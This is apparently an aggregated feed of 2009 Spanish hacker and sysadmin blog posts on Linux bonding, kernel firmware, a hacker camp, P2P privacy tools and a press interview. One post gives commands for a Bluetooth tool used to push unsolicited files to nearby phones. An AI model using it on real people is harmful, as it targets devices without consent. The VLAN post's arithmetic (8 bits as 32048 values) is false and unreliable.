Hckrs

Blackhold: A la hora de recoger cables

noreply@blogger.com (Blackhold) — Fri, 03 Jul 2009 01:00:08 +0000

¡Tesla! ¿porque no viviste 20 años mas?

Blackhold: Bonding y VLANs

noreply@blogger.com (Blackhold) — Thu, 02 Jul 2009 22:03:57 +0000

Hoy es uno de aquellos días los cuales ves la luz! hoy tras una tarde gloriosa de solucionar un problema de audio en un flamante imac con una aceptable ubuntu, el cual el alsa-base no detectaba el chipset LE889A y un destrozado marca no te fijes con problemas con el driver nvidia, mientras me estaban enseñando el interfaz del vmware esx (chisno, esta para ti!) me han explicado una tontería sobre las VLANs, me ha permitido verlo claro del todo para el resto de mi vida el concepto de VLAN.

Muchas veces en los sistemas solías ver la posibilidad del bonding, hacer que dos interfaces de red actuasen como una sola con el doble de velocidad o en los routers la posibilidad de crear VLAN.

En ninguna de las dos cosas no les había prestado aún demasiada importancia, en el trabajo anterior los últimos servidores que teníamos venían con windows y el bonding configurado. Tras investigar un poco descubrí que también era posible hacerlo en linux. Pero ahí me quedé. Ni siquiera probarlo. Hasta que hoy he hallado un pequeño manualillo de como crear un bonding en linux.

1. # apt-get install modutils

Add in /etc/modprobe.d/aliases and in /etc/modutils/aliases

alias bond0 bonding
alias eth0 e100
alias eth1 e100
options bonding mode=2 miimon=100

(I chose mode2 for load balancing instead of round robin nics with mode 0)

2. During debian installation I choosed eth1 as default nic, this implies that in the ifenslave command eth1 come first and eth0 after. My interfaces file is

# The primary network interface
allow-hotplug eth0
allow-hotplug eth1
#iface eth1 inet static
auto bond0
iface bond0 inet static
pre-up ifconfig bond0 up
pre-up ifconfig eth1 up
pre-up ifconfig eth0 up
address 192.168.1.69
netmask 255.255.255.0
#hwaddress ether 00:14:C6:33:5D:81
gateway 192.168.1.254
up ifenslave bond0 eth1 eth0
down ifconfig eth1 down
down ifconfig eth0 down
down ifenslave -d bond0 eth1 eth0

(I added down commands since /etc/init.d/networking stop hanged completelly my box)

That's all

El concepto del bonding pues, es hacer que en el mismo tubo de cable de red pase el doble de información, fusionando dos o mas interfaces de red, como los super héroes de bola de drac, fusionándose se hacían mas fuertes!

En cambio, el de las VLANs, es justo lo contrario, dividir el tráfico que pasa por el tubo de cable de red en miles de redes independientes una de otras.

Lo que no entendía de las VLAN era como iba a enterarse el router de que los paquetes que le llegan pertenecen a una VLAN u otra. El secreto está de nuevo en el cabezal del paquete, hay 1 byte reservado a las VLAN, es decir, 8 bits, que son 32048 valores distintos, es decir 32048 VLAN distintas!

Para crear VLAN podemos hacerlo tanto con un hardware o con un linux, identificando cada una de las redes virtuales por ejemplo con eth:0, eth:1, eth:2, etc.

Las VLAN son de gran utilidad tanto en el entorno empresarial como en el doméstico.

Dentro de un mismo edificio o casa tenemos cada vez mas, mas aparatos que tienen la funcionalidad de conectarse entre ellos, como podrían ser los ordenadores, la televisión por cable o ADSL, los teléfonos IP, etc. Esto permite que en un solo cableado conviven los datos de las distintas VLAN, como si se tratase de una autopista, los coches rojos etiquetados como VLAN_rojos, los blancos como VLAN_blancos.

Muchas gracias a todos los que hoy me habéis permitido ver la luz!

Blackhold: SCG09 - 17, 18 y 19 de Julio, Les Preses (La Garrotxa)

noreply@blogger.com (Blackhold) — Wed, 01 Jul 2009 22:02:34 +0000

Se acercan ya las fechas de la segunda edición del Summer Camp Garrotxa.

Para los que no lo sepáis aún, el summercamp es un evento encarado a la parte mas técnica del mundo de los ordenadores. Dos de sus principales características son que se hace al aire libre y que las charlas son de noche (de 19h a 3h); ¿el motivo? poder sofocar el intenso calor de los días de verano, aprovechando que La Garrotxa se encuentra en una zona trans-pirenaica y por costumbre las noches ahí son frescas.

El campamento dispone de una zona de acampada, otra de duchas y servicios, otra de comida y otra de charlas. El summercamp y la volcánica van a convivir en dos espacios distintos.

Durante los tres días de estancia podréis participar en las distintas actividades y concursos como un hackit, juegos de ordenador (consultar volcanica.cat para mas información), tiro con arco, lucha de espadas o un curioso experimento de envío de correos electrónicos sin ordenador.

La volcanica es la LAN Party con la que compartimos espacio este año, sirve para compartir unas mejoradas infraestructuras, como unos mejores servicios o servicio de cátering que tendrá que reservarse hasta el propio sábado 18 de Julio a las 11 de la mañana. Este cátering ofrecerá algunos de los platos típicos de la zona.

La entrada al summer camp será de 15€ y la de la volcánica 20€. La entrada incluye el acceso a la zona de acampada, a la zona de charlas, servicio de barra, una camiseta del evento y una bolsa con el programa y algunas sorpresas...

El precio del cátering será de 8€ por comida.

Las charlas del summer camp van a ser:

Viernes
- 20:30 - Nixos
- 22:30 - DoS sobre TCP/IP
- 00:00 - CSK
Sábado
- 19:00 - Programación para niños
- 22:00 - Hardware libre y electrónica bajo GNU/Linux
- 00:00 - XSS for fun and profit
- 02:00 - Radare
Domingo
- 12:00 - Mesa redonda: viabilidad de las redes wifi y las redes públicas

Para ver las charlas de la volcánica acceder a éste link: http://www.volcanica.cat/?page_id=404

Las fechas del summercamp son el 17, 18 y 19 de Julio, en el centro social del bosc de tosca en la población de Les Preses (La Garrotxa, Girona).

En la página web, encontraréis información de las conexiones entre las principales ciudades de la zona.

Esperamos que los que asistieron el año pasado decidan pasarse otra vez junto a nuevos acompañantes tanto del mundo real como del virtual.

Muchas gracias a todos! \o/

all your base are belong to us...

http://www.hacklabs.org/summercamp

Blackhold: El rap de los hadrones

noreply@blogger.com (Blackhold) — Tue, 30 Jun 2009 01:05:06 +0000

Hoy no estoy para pensar mucho y os dejo un curioso vídeo visto en microsiervos

Y piensas que no solo mola sino que puedes hacerlo tan bien como ella o incluso mejor, esta es tu oportunidad, ya que el equipo del ATLAS, uno de los instrumentos del LHC, está buscando un becario que esté dispuesto a preparar un proyecto multimedia que documente las primeras colisiones que se produzcan en el LHC, algo que se espera que ocurra este otoño.

Para participar hay que preparar un vídeo o una pieza multimedia en inglés o subtitulada en inglés de un máximo de cinco minutos de duración que describa el instrumento ATLAS y enviarlo antes del 31 de julio según se explica en las bases del concurso [PDF 117 KB].

Los mejores se colgarán en la web del ATLAS y en YouTube, y de ellos se escogerá un ganador al que se le ofrecerá una plaza de becario en el CERN durante el otoño de este año -o cuando se vaya a poner en marcha el LHC- para que monte su proyecto. Alternativamente, el ganador puede optar por un paquete completo de Adobe Production Suite.

Los que queden en segundo y tercer lugar recibirán premios aún por determinar, pero que en cualquier caso no consistirán en plazas de becario.

Todos los detalles están en ATLAS/CERN Multimedia Contest and Intern Program, desde donde también hay un acceso a la biblioteca de fotos y vídeos del CERN que se pueden usar para crear la pieza para enviar al concurso.

¡Suerte!

Blackhold: instalación de firmwares de hardware no integrados en el kernel

noreply@blogger.com (Blackhold) — Mon, 29 Jun 2009 01:22:14 +0000

A ver si el título cabe en una sola línea, pero no sabía muy bien como resumirlo.

Llevo todo el fin de semana intentando instalar una debian squeeze from scratch, pero no ha habido forma por algun problema con los paquetes daily de instalación disponibles y finalmente he tenido que instalar una estable (businescard) y upgradear a squeeze, entre instalación y upgrade he estado cerca de 2 horas, la conexión de casa hoy volvía a funcionar lenta, quizás el router estaba haciendo la siesta por el intenso calor que ha hecho hoy en la ciudad condal.

Una vez a squeeze he instalado todos mis programas y he puesto el escritorio con mas o menos la misma distribución que antes.

Tras hacer el checkeo del hardware he visto que la webcam y la wifi no funcionaban, así que he revisado los programas que había instalados (iwlwifi y v4l) y si lo estaban, tenía pinta de un problema de módulos ya que el dmesg ni siquiera soltaba errores al intentar cargar lo que vendrían a ser los drivers, los firmwares, unas librerías que actúan como puentes entre el núcleo del sistema operativo y el chip del componente de hardware.

Así que este post va de esto, como hacer que funcionen las cosas que por culpa de ser un hardware estraño, aún en desarrollo o directamente que sea tan nuevo que aún no haya habido tiempo para crear una comunidad para aquel hardware.

Normalmente tenemos comunidades que engloban varios subproyectos para cada uno de los hardwares, permitiendo así una amplia compatibilidad de dispositivos instalando un simple paquete (este ya precompilado en nuestro kernel) como podría ser v4l o iwlwifi.

Partimos de que algún programador haya sacado el firmware del dispositivo para linux, cada vez mas pero, nos encontramos que los propios fabricantes ya sacan estos firmwares (empaquetados para que no se pueda acceder al código), como podría ser intel o nvidia (este último con un basto .bin que te hace todo el trabajo sucio).

Vamos a ver así como vamos a integrar un firmware no contemplado en el kernel de linux. Además todo este proceso se puede realizar independientemente de la versión de kernel, si una cosa funciona ¿para qué vamos a cambiarla?

Primero de todo descargamos los sources del kernel completos (F) para poder compilarlos. Si buscamos un kernel mas antiguo tenemos este histórico. En el caso de hoy he tenido que instalar un kernel antiguo (2.6.27) para comprobar una cosa y me ha ido bien este directorio :)

Voy a usar como ejemplo el último kernel estable, el 2.6.30, todo indica que dentro de poco estará listo el 2.6.31 con un montón de nuevas funcionalidades.

# cd /usr/src
# wget -c http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.30.tar.gz
# tar xvjf linux-2.6.30.tar.gz
# ln -s linux-2.6.30 linux
# cd linux
# ls

Aquí tenemos el código del kernel, si te aburres puedes ir leyendo todas las líneas y entrando en todos sus directorios y revisar sus miles de ficheros, pero tenemos una forma mas sencilla de configurar el kernel. Será necesario instalar un par de paquetes.

# apt-get install build-essential libncurses5 libncurses-dev

y luego ya podremos entrar en el menú de configuración

# make menuconfig

Antes de empezar a toquetear fijaos en los dos últimos elementos del menú principal:

Load an Alternate Configuration File: para cargar la configuración de otro kernel que ya tengamos compilado, para no tener que ir configurando cosas a la que actualizas a un nuevo kernel.
Save an Alternate Configuration File: para guardar los cambios que vayamos haciendo, pero finalmente el fichero de configuración que importa es el .config

Los últimos kernels que he compilado los he compilado directamente tal como venían y no me ha dado problemas, incluso os diría que no he visto ningún kernel panic desde noviembre, en el hackmeeting (aquella frustración de compilación de kernel a las 5 de la madrugada, compilar requiere tiempo de espera y te permite hacer otras tareas lejos del ordenador).

Así que si tienes un procesador intel no muy antiguo te va a valer el kernel, sino en Processor type and features > Processor family podemos escoger entre un amplio abanico de procesadores, y si no está soportado simplemente tendrás que buscar el firmware para linux y modificar unos ficheritos y ya estará soportado :D

Tras una anécdota y un pequeño avance vamos a seguir adelante.

Haremos lo que queramos con el fichero de configuración, pero finalmente el que manda es el .config, hagamos lo que hagamos al salir nos pedirá como queremos llamar el fichero.

Ahora dejamos aparcado el .config y nos vamos a descargar el firmware.

Como el chipset de la wifi es de intel, tengo la ventaja de que los señores de intel ya me ofrecen un firmware cerrado, weno, menos da una piedra.

http://intellinuxwireless.org/?p=iwlwifi

Y en download vamos a descargar el firmware

http://intellinuxwireless.org/?n=downloads

En mi caso me descargo el de la serie 5000.

# cd /home/laura/bin/
# wget -c http://intellinuxwireless.org/iwlwifi/downloads/iwlwifi-5000-ucode-8.24.2.12.tgz
# tar xvzf iwlwifi-5000-ucode-8.24.2.12.tgz
# cd iwlwifi-5000-ucode-8.24.2.12
# ls

Normalmente junto al firmware tenemos un fichero README que nos ayudará a instalar el firmware en el kernel.

En los kernels mas nuevos hay habilitada una funcionalidad para cargar firmwares automáticamente.

Los firmwares del hardware tienen que copiarse siempre en /lib/firmware, este directorio es dónde va a buscar los firmwares que no vienen por defecto con el kernel y están presentes en el fichero .config del que he hablado antes.

En el README nos propone la forma de los kernels modernos:

Device Drivers ->
Generic Driver Options ->
Hotplug firmware loading support

Si no está soportado mas abajo en el README cuenta como agregarlo.

Luego estos firmwares los cargaríamos con el module-assistant que menciono en este otro post.

En este post voy a explicar como cargar directamente el soporte para el nuevo firmware.

Editaremos el .config y buscaremos los siguiente:

#CONFIG_IWLWIFI_DEBUG is not set
CONFIG_IWLAGN=m
CONFIG_IWLAGN_SPECTRUM_MEASUREMENT=y
CONFIG_IWLAGN_LEDS=y
CONFIG_IWL3945=m
CONFIG_IWL3945_SPECTRUM_MEASUREMENT=y
CONFIG_IWL5000=y

estos valores los encontraremos normalmente en la página web del proyecto o fabricante, sino en algun foro.

cada uno de las lineas hace referencia a un firmware o paquete (esta parte no la tengo muy clara aún hehe), la nomenclatura es:

y cargado en el kernel
m se carga como un módulo (modprobe modulo)

las líneas comentadas va a pasar de ellas, y para facilitar su búsqueda tenemos un "is not set" para poder filtrar rápidamente los módulos disponibles no configurados o desactivados, es importante documentarse antes de modificar cualquier valor de este fichero.

En el .config del kernel 2.6.30 he tenido que añadir estas líneas:

CONFIG_IWLAGN=m
CONFIG_IWLAGN_SPECTRUM_MEASUREMENT=y
CONFIG_IWLAGN_LEDS=y
CONFIG_IWL5000=y

ya que una se encontraba comentada o las otras que directamente no estaban.

Una vez finalizado este pequeño hack del kernel procedemos a compilarlo. Por comodidad ya tengo en mi buch de herramientas una línea compila-kernels ;)

# make && make install && make modules_install && mkinitramfs -o /boot/initrd.img-2.6.30 2.6.30 && update-grub

Al cabo de unos 20-60 minutos, depende de la potencia de la maquina tendremos el kernel compilado y preparado para reiniciar la máquina y comprobar que la instalación del driver ha sido fructuosa :)

marcos.blog: Automount permissions

Sat, 27 Jun 2009 12:13:51 +0000

Another post about ArchLinux, just to keep the info somewhere.

Today I was playing with the LXDE destktop. When using the filemanager (PCMan filemanager) I tried to automount a plugged in USB stick. No luck at first shot. Going through the ArchLinux wiki I found how to fix it. The point is the combination of the last HAL version and PolicyKit. I was starting my session with exec startlxde so the desktop was not aware of any PolicyKit stuff. The solution, as explained in the wiki, is to launch the session as exec ck-launch-sessoin startlxde. Afther that, and having DBus policies configured, automount was successfully working.

You can check it in detail in the corresponding wiki page.

marcos.blog: USB Card Reader ArchLinux

Sat, 27 Jun 2009 12:08:34 +0000

Having ArchLinux recently installed in my laptop, it was time to set it up to use my FSFE CryptoCard.

It's easy enough when you know which package to install, from the AUR, because they're not in the Pacman repositories.

So, the packages needed are pcsclite and ccid.

Blackhold: Reflexiones

noreply@blogger.com (Blackhold) — Tue, 23 Jun 2009 00:59:38 +0000

64bits no es lo mismo que 32bits.

Blackhold: 卐.com

noreply@blogger.com (Blackhold) — Sat, 20 Jun 2009 14:15:12 +0000

Magnifica lección de cultura general la que te ofrece esta página web (curioso el link!).

En Europa asociamos este símbolo, 卐, como el que usaron los nazis durante la segunda guerra mundial. Pero este símbolo fue robado a otras culturas, es como si ahora crease una secta y usase la @ como símbolo:

El 卐 es un símbolo hindú.

El 卐 es un símbolo de budista.

El 卐 aparece sobre mapas en Asia denotar templos.

El 卐 es famoso.

El 卐 quiere decir la buena suerte.

El 卐 es casas utilizadas en India.

El 卐 es un diseño común en muchas culturas.

Hay una ciudad llamada 卐 que ha rechazado cambiar su nombre.

El 卐 es uno de los símbolos más poderosos en el mundo.

El 卐 es un símbolo antiguo que fue abusado por europeos racistas.

El 卐 fue prohibido por Google de resaltarse en sus tendencias de búsqueda.

Ellos muestran del 卐 es encontrado para ser ofensivo por europeos racistas.

La esvástica se ha hecho famosa en 4chan.

Blackhold: Bluetooth hacking

noreply@blogger.com (Blackhold) — Fri, 19 Jun 2009 20:31:53 +0000

Y para terminar hoy una de bluetooth hacking.

Ha pasado un tiempo y creo que ya sería hora que empezase a salir un pequeño meeting de hacktivistas espontáneo que salió a finales del año pasado.

En la acción no se dañó ningún bien empresarial, ningún bien público (no destrozamos ninguna cabina de teléfonos para la micro acción) y tampoco se maltrató a ningún animal.

El vídeo cuenta el desarrollo de la acción y el funcionamiento del programa (que cuento mas abajo), además de su conclusión, todo explicado con una genial musiquilla de fondo a manos de tangible. (8 bit peoples).

El programa usado (como podéis ver en el vídeo) es el bluetotem, desarrollado en parte por darkwave (¡un saludo! ¡espero verte pronto!).

La instalación y el funcionamiento son muy simples:

# cd /home/laura/bin
# mkdir bluetotem && cd bluetotem
# svn co http://code.autistici.org/svn/bluetotem
# apt-get install libnet-server-perl ussp-push

Y ya tenemos el bluetotem instalado en el directorio bin de nuestro home.

Bluetotem son dos scripts de perl, uno que busca las MAC de los dispositivos con el bluetooth activado y el otro manda el fichero por push a las MAC detectadas.

$ ./monitor.pl
$ ./dispatcher.pl fichero_a_mandar

Y a spammear por bluetooth tu fichero de datos (por ejemplo ficheros de texto).

Han pasado algunos meses desde la micro acción, encontramos algunos bugs al programa o cosas que se podrían modificar y se los mandamos a dw.

El sistema de envío de un mensaje requería una autorización del usuario del dispositivo, como estábamos en la calle la gente aceptaba el mensaje, pero al recibir el fichero ya estábamos fuera del alcance de la señal. Así que el sistema funciona mejor en zonas dónde la gente está quieta (transporte público, manifestaciones, etc.) .

El desarrollador nos comentó que estaba estudiando de explotar la vulnerabilidad que tienen algunos dispositivos bluetooth que permiten recibir texto sin necesidad de autorización.

marcos.blog: Finalmente, ¡Ingeniero!

Fri, 19 Jun 2009 10:33:36 +0000

Se ha alargado un poco más de la cuenta, pero al final, puedo dar por finalizada la carrera. Me acaban de confirmar que he aprobado la última asignatura, así que puedo decir que soy un nuevo Ingeniero Superior de Telecomunicaciones.

Menudo peso de encima me he quitado. Realmente no cambiará mucha cosa (almenos en el corto plazo) pero sólo la tranquilidad de saber que ya está acabado...

Blackhold: Pitivi

noreply@blogger.com (Blackhold) — Fri, 19 Jun 2009 01:05:57 +0000

Empecemos con un interesante programa, hago mención de él y lo dejo en la lista de programas a seguir investigando.

Hablamos de Pitivi, un editor lineal de vídeo, similar al cinelerra.

Los que usamos cinelerra estamos pendientes del estado (en fase alfa) del lumiera, la reprogramación del cinelerra, que en principio va a soportar varios plugins y ya no será necesario recompilar todo el programa cada vez que queramos añadir alguna funcionalidad. Por otra cosa que lo estamos esperando es para poder disponer de un programa que no se cierre a la mínima por pulsar en el sitio incorrecto en el momento crucial de la edición de un vídeo.

En la imagen una captura de pantalla que he encontrado en la wiki del proyecto.

Su instalación es super simple, ya que la tenemos en las sources de debian :D

# apt-get install pitivi

Si no os aparece en los repos buscad en debian-multimedia

# wget -c http://www.debian-multimedia.org/pool/main/d/debian-multimedia-keyring/debian-multimedia-keyring_2008.10.16_all.deb
# dpkg -i debian-multimedia-keyring_2008.10.16_all.deb

# vi /etc/apt/sources.list
deb http://www.debian-multimedia.org squeeze main

# apt-get update

No he probado el programa pero tiene buena pinta :)

Gracias PiRuLi por el link :D

Blackhold: El cine que no amaba a las mujeres hacker

noreply@blogger.com (Blackhold) — Fri, 19 Jun 2009 00:35:07 +0000

Pues vayamos por el segundo post, este con la etiqueta de hacktivismo.

Hace un par de semanas recibí un correo de Mercè Molist con la propuesta de ver una película y hacer una entrevista, Mercè propuso una charla para el Summer Camp sobre ética Hacker, pero los estrictos plazos de confirmación de las charlas no pudo asegurar que asistiese al Summer Camp Garrotxa de este año. Mercè, así que espero que puedas asistir este año y podamos charlar un rato bajo el manto de estrellas que nos cubrirá los días 17, 18 y 19 de Julio junto con otros viejos amigos hacktivistas.

Os pego el artículo que salió en formato digital y en papel (¡2 páginas de periódico de artículo y foto! me palpitaba el corazón rapidísimo a la que lo ví y el quiosquero se quedó mirándome raro por comprar un periódico de noticias del mundo real en lugar de el jueves o revistas de informatica o fotografia varias).

El cine que (no) amaba a las mujeres 'hacker'

Andróginas, solitarias, duras, anoréxicas, así pinta el celuloide a las mujeres que se dedican a la informártica

"Qué tía más rara", exclama Blackhold nada más salir de ver la película Los hombres que no amaban a las mujeres, basada en la novela del mismo nombre y cuya protagonista es una joven hacker. Blackhold, informática de 26 años de edad, se mueve en ambientes underground donde coincide con mujeres hacker que, asegura, no son exactamente como en las películas. Primero fue la brillante Sandra Bullock de La red; después vinieron la agresiva Angelina Jolie de Hackers y la glacial Trinity de Matrix. Lisbeth Salander, protagonista de Los hombres que no amaban a las mujeres, es el rizo del estereotipo de la mujer hacker, una mezcla de todas las anteriores con una novedosa carga psicológica: muy mental y masculina, siniestra hasta la crueldad, la perfecta víctima de una familia disfuncional. Como ya hicieron la literatura y el cine con sus compañeros, las mujeres hacker contemplan cómo se las presenta al gran público embutidas en un saco de tópicos. Así lo cree Blackhold: "Las chicas que conozco relacionadas con la informática no llevan piercings y tatuajes como Lisbeth, o por lo menos no tantos. Son chicas normales y más abiertas". La bella y legendaria Barbara Thoens, del grupo alemán de hackers Chaos Computer Club, o la polaca experta en virus Joanna Rutkowska, que no sale de viaje sin una plancha y su kit de maquillaje, posiblemente gritarían ante el desaliño y masculinidad de Lisbeth. Y la corpulenta Binaria, integrante en los años 90 del grupo español La Vieja Guardia, debe desternillarse ante tanta hacker anoréxica de película. Tampoco nada tiene que ver con el tópico cinemtográfico de la mujer hacker, Amaya Rodrigo, la dulce amante de los animales, la primera mujer programadora de Debian (una distribución de GNU/Linux) en Europa. Fundadora de Debian Women y defensora de los derechos de las mujeres en la red, la estética de Rodrigo se parece más bien poco a la ciberpunk Lisbeth. Blackhold añade: "No son mujeres agresivas, como se ve en la película, pero sí muy activas, impulsivas, que no pierden el tiempo". Blackhold trabaja como administradora de sistemas en Barcelona. A los tres años de edad jugaba con un Commodore, y a los cuatro cargaba ella sola los juegos. "Aprendí a escribir a máquina antes que a mano", explica. No ha habido tinglado hacktivista en los últimos años donde no estuviera esta joven. En 2008, organizó el primer encuentro técnico Summer Camp Garrotxa, que este año a mediados de julio, se repite en Girona. Blackhold asegura no sentirse identificada con la protagonista de la película, pero sí comparte algunos rasgos psicológicos, aunque con algo menos de intensidad, como la sintonía con las ideas ciberpunk o la relación con los temas llamados femeninos: "Muchas cosas que se atribuyen a las mujeres, como maquillarse o hablar de vestidos, me aburren. Prefiero mil veces hablar de cualquier tema técnico". Blackhold considera que la timidez y caracter solitario de Lisbeth son comunes a muchos y muchas hackers, causa y consecuencia de pasar tantas horas ante un ordenador, hasta convertirlo en un arte. Pero es una soledad física, que no mental: "Gracias a la informática he conocido a muchísima gente y he podido hacer cosas de las que no habría sido capaz si no estuviese en un mundo tan activo". Para Blackhold, el gran fallo de la ficción, tanto en Los hombres que no amaban a las mujeres como en películas anteriores, reside en que pintan a las mujeres hacker como simples remedos de sus alter egos hombres: "Lisbeth intenta reunir todos los tópicos de cómo debería ser un hacker masculino y eso hace que tenga un carácter agresivo, frío y vengativo". No se puede culpar al novelista sueco Stieg Larsson, autor del libro, por su poco conocimiento de las mujeres hacker. Son tan pocas y suelen esconderse tanto de la luz pública, más que sus compañeros, que el trabajo de campo era difícil. Hay apenas unos pocos estudios serios. El más reciente, de 2006, de la Universidad de Cambridge, afirmaba que en las comunidades de software libre, donde se suelen iniciar los hackers, sólo el 1,5% son mujeres. Posiblemente, Larsson se inspiró en las películas ya citadas o en los libros ciberpunk de William Gibson, donde la mayoría de mujeres son calcadas a Lisbeth. Mientras, en el mundo real, las hackers son menos siniestras, pero tanto o más listas.

¿Una 'hacker' de verdad actuaría como en la película?

El trabajo de Lisbeth Salander consiste en investigar a otras personas, accediendo a sus ordenadores y a las bases de datos donde haya información sobre ellas. Es una hacker profesional y este oficio, aunque minoritario, es real. También se acercan mucho a la realidad los detalles informáticos que muestra la película. Aún así, Blackhold detecta algunos fallos: "Lisbeth entra en el ordenador del periodista protagonista y espía sus documentos, pero me extraña cómo puede abrir y cerrar los ficheros, en entorno gráfico, sin que él se dé cuenta". La forma correcta sería "conectarse en modo invisible y, una vez dentro del portátil, transferir los ficheros al suyo". También es erróneo, asegura Blackhold, que Lisbeth introduzca en su portátil la tarjeta de memoria de su cámara digital: "Los MacBook Pro, como el de Lisbeth, no tienen lector de esas tarjetas". Además y desde una óptica hispana, pocos hackers usan ordenadores Apple, pero Blackhold aclara: "De Alemania para arriba, hay gente muy buena con un Mac". En cuanto a los aciertos de la película, Lisbeth pide a su tutor 20.000 coronas suecas (1.800 euros) para comprar un portátil: exactamente lo que cuesta un MacBook Pro de 15". También vemos una terminal con directorios reales del sistema operativo Mac OS X. E incluso, se regocija Blackhold, "la hacker hace un find". El comando find sirve para buscar cosas. Queda a la discreción de cada hacker si haría lo que Lisbeth: para ayudar al periodista en su investigación, acaba revelándole que está espiando su ordenador. La opinión de Blackhold: "Un hacker se interesa y arriesga por algo si se le presenta realmente como un reto. Los hackers aman los retos".

Mercè Molist.

Blackhold: Cosas varias

noreply@blogger.com (Blackhold) — Fri, 19 Jun 2009 00:03:31 +0000

A ver, por donde empiezo, la disculpa típica de que llevo días posteando poco... bueno si, vale, ya se... que ando muy liada, con el cambio de trabajo y el scg y al llegar a casa sólo tengo ganas de hacer cosas de end user, pero hoy os voy a deleitar con varios post ;)

Como de costumbre un tema por post.

Blackhold: Bitblinder y OneSwarm

noreply@blogger.com (Blackhold) — Sat, 13 Jun 2009 06:20:40 +0000

Por fin tenemos ya la respuesta de la comunidad de software libre a los continuos ataques de los gobiernos a la tan necesaria neutralidad en la red.

Parece que esta semana el consejo institucional francés ha censurado la parte mas polémica de la ley HADOPI propuesta por Nicolas Sarkozy, en la cual restringía la conexión a internet de aquellos que usaban las redes P2P, 3 avisos serían necesarios para cortar la conexión a internet del abonado. El Consejo Institucional elevó la libertad de acceso a internet a la altura un derecho fundamental (link1, link2).

Esta ley no ha hecho nada mas que reabrir el debate de la neutralidad en la red y el consumo sin ánimo de lucro de productos comerciales (denunciando también el abuso de algunas entidades de gestión mediante la imposición de canones sobre medios digitales indistintamente de su uso final aboliendo la presunción de inocencia de los ciudadanos).
Unos pocos quieren enriquecerse a costa de otros, denunciando la precaria situación de los profesionales que viven de la cultura, la cual son las propias discográficas las principales causantes ofreciendo contratos basura a los artistas y prometiendo unos beneficios mínimos que nunca llegan.
Un autor tiene que ganarse la vida ofreciendo conciertos y vendiendo sus productos, y la mejor forma de hacerlo es darse a conocer, y ¿cuándo mejor que ahora con la existencia de internet?

Por otra parte denunciar la poca distribución que se hace de productos culturales alternativos y no comerciales, subsanada con el uso de redes P2P y páginas de videos, música y libros on-line.

Los tiempos cambian y es necesario saber adaptarse a ellos.

Bitblinder, es el primer cliente bittorrent que convierte las conexiones en anónimas. Este crea una red similar a tor entre los distintos usuarios del Bitblinder. Para dar una idea, el proyecto tor consiste en una red de ordenadores con un servidor proxy cada uno, transfiriéndose así los paquetes de datos entre unos servidores y otros, permitiendo ocultar la dirección IP del usuario inicial que ha realizado la petición de la transferencia de datos.

Para descargar este programa lo haremos usando este link. Como podéis ver, como muchos los proyectos libres, está en multi-plataforma, tanto para Mac OS X, como Windows, como GNU/Linux (.tar.gz o .deb).

Este proyecto tiene una pega, que se critica mucho en los foros del proyecto, que son necesarios usuario y contraseña. En la página de descarga ofrecen un anonymous sin password, pero que parece deshabilitado por la gran avalancha de descargas, estando el proyecto aún en fase beta (de prueba).

Hay que tener en cuenta este cliente para el futuro.

Tenemos otro cliente bittorrent basado en java desarrollado en la universidad de Washington que permite cifrar los datos que se están transfiriendo siendo casi imposible de detectar para terceros. Se trata de OneSwarm (versión en español).

En la página del proyecto citan textualmente:
"OneSwarm es una nueva aplicación P2P que proporciona a los usuarios con control explicito sobre su privacidad activando un control exhaustivo sobre cómo sus datos son compartidos. Al contrario de compartir datos indiscriminadamente, los datos son compartidos en OneSwarm pueden hacerse públicos, compartidos con amigos, compartidos sólamente con algunos amigos pero no con otros y así sucesivamente. Lo podemos llamar un compartido F2F (amigo-a-amigo) de datos."

Este cliente se puede descargar aquí (aviso, el programa es un poco tocho y ocupa 26,6Mb).

Para usarlo en GNU/Linux, descargaremos el .tar.gz, lo descomprimimos y ejecutamos el script OneSwarm.

La primera impresión es que está basado en web, el script nos arranca una nueva ventana en el navegador con la dirección: http://127.0.0.1:29615/

Lo primero que te viene a la cabeza es empezar a buscar cualquier cosa para hacer un test de velocidad, pero te encuentras con la sorpresa que pongas lo que pongas los resultados están vacíos, esto se debe a que es necesario añadir amigos con los que compartir ficheros. Esto a simple vista parece absurdo, pero tus amigos pueden conocer a otros amigos y estos pueden disponer del fichero que buscas. Para ello añadadiremos amigos con el link add friend (necesitaremos la clave publica y el nickname del otro usuario en la red OneSwarm).

El cliente también permite descargar ficheros torrent, que podemos encontrar en páginas como thepiratebay.org, en la siguiente captura tenéis un ejemplo de descarga.

Sin configurar puertos esta es la velocidad de descarga que alcanza el programa. Por otra parte, este te avisa con un popup si el programa tiene limitaciones para salir a internet.

El interfaz de este programa es sencillo y muy intuitivo, así que en pocos minutos es posible adaptarse a su interfaz. Tiene pinta de ser muy potente :)

Existen otros clientes y a medida que avancen los meses van a salir otros clientes de bittorrent con otros métodos de ocultación y cifrado de datos.

Blackhold: Summer Camp Garrotxa 2009

noreply@blogger.com (Blackhold) — Thu, 11 Jun 2009 19:05:48 +0000

Ya tenemos a la vuelta de la esquina la segunda edición del Summer Camp Garrotxa (17, 18 y 19 de Julio en Les Preses (La Garrotxa)), este evento relacionado con las nuevas tecnologías que se hace en medio de la naturaleza y que las charlas son de noche en lugar de día.

Este año cambiamos de espacio, el motivo principal es por las infraestructuras, el año pasado nos encontrábamos literalmente tirados ahí en medio de un campo, este año al juntarnos con la Volcànica LAN Party, había una necesidad mayor de la existencia de unas infraestructuras mínimas, así que el espacio de este año es el centro social Bosc de Tosca.

La parrilla de charlas nos ofrece 7 charlas técnicas y una mesa redonda abierta a los participantes (la volcànica LAN Party también tiene parrilla de charlas pero aún no está terminada).

Viernes:
20:00 - 21:30 NixOS
22:30 - 0:00 DoS sobre TCP/IP (Dosis)
0:00 - 1:30 CSK

Sábado
19:00 - 20:30 Programación para niños
22:00 - 23:30 Hardware libre y electrónica bajo GNU/Linux
0:00 - 1:30 XSS for fun and profit
2:00 - 3:30 Radare

Domingo
12:00 - 14:00 viabilidad de las redes wifi y las redes públicas (mesa redonda abierta a todos los participantes)

Para los participantes habrá servicio de cátering (8€), pero hay de plazo hasta el sábado 18 de Julio a las 11 de la mañana para indicar qué comidas se van a quedar los asistentes.

La entrada al Summer Camp Garrotxa es de 15€ y la de la Volcànica LAN Party de 25€, en la entrada entra una camiseta y una bolsa del evento.

En este link tenéis como llegar hasta el sitio.

Para cualquier duda contactar con scg [a] associacio-aoe.org

Muchas gracias de antemano a todos los asistentes.

Blackhold: cmo conseguir mas comentarios en tus pots

noreply@blogger.com (Blackhold) — Fri, 05 Jun 2009 03:51:49 +0000

